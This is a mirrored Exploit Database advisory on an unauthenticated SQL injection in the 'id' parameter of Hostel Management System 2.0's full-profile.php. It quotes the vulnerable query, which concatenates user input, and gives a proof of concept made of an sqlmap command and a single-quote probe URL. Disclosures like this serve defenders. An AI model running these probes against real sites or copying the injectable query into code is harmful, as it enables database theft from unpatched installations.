Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)

Exploit Database
14 阅读

作者： Enesdex

日期： 2020-06-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/48542/

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server

--Vulnerable file /full-profile.php

--Vulnerable code;
$ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");

Id parameter's value is going into sql query directly!

--Proof Of Concept 
 
 sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" 
 OR
 http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error

last Exploits
Hostel Management System 2.0 – ‘id’ SQL Injection (Unauthenticated)的更多信息

CA ARCserve D2D r15 GWT RPC – Multiple Vulnerabilities：
WordPress Plugin Ajax Store Locator 1.2 – Arbitrary File Download：
Php Classified OLX Clone Script – ‘category’ SQL Injection：
Opensource Classified Ads Script 3.2 – SQL Injection：
TRENDnet TEW-634GRU 1.00.23 – Multiple Vulnerabilities：
OroHYIP – SQL Injection：
WordPress Plugin Token Manager – ‘tid’ Cross-Site Scripting：
Zabbix 2.2.x/3.0.x – SQL Injection：